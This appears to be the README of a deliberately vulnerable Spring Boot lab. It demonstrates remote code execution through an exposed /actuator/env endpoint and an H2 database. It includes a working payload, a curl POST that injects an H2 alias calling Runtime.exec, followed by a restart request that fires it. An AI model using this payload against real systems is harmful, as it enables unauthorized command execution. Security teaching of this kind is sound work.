Skip to content
Sample Spring Boot App Demonstrating RCE via Exposed env Actuator and H2 Database
Java Dockerfile
Branch: master
Clone or download
Latest commit 56c4b95 Jan 13, 2020
Type Name Latest commit message Commit time
Failed to load latest commit information.
src/main/java/hello First commit Jan 12, 2020
target First commit Jan 12, 2020
Dockerfile First commit Jan 12, 2020 First commit Jan 12, 2020 First commit Jan 12, 2020
mvnw First commit Jan 12, 2020
mvnw.cmd First commit Jan 12, 2020
pom.xml First commit Jan 12, 2020

Spring Boot Actuator H2 RCE


This is a sample app based off the default Spring Boot app in Spring's documentation that demonstrates how an attacker can achieve RCE on an instance with an exposed /actuator/env endpoint and a H2 database.


First, start the app. You can do this locally or with Docker.


If you run this locally, you need JDK 1.8 or later and Maven 3.2+.

./mvnw package && java -jar target/gs-spring-boot-docker-0.1.0.jar


  1. sudo docker build -t spaceraccoon/spring-boot-rce-lab .
  2. sudo docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab

The app is now running on localhost:8080.


  1. (Modify the curl request accordingly) curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return;} throw new IllegalArgumentException(); }\');CALL EXEC(\'curl\');\"}' 'http://localhost:8080/actuator/env'
  2. curl -X 'POST' -H 'Content-Type: application/json' 'http://localhost:8080/actuator/restart'

You will receive a pingback.

You can’t perform that action at this time.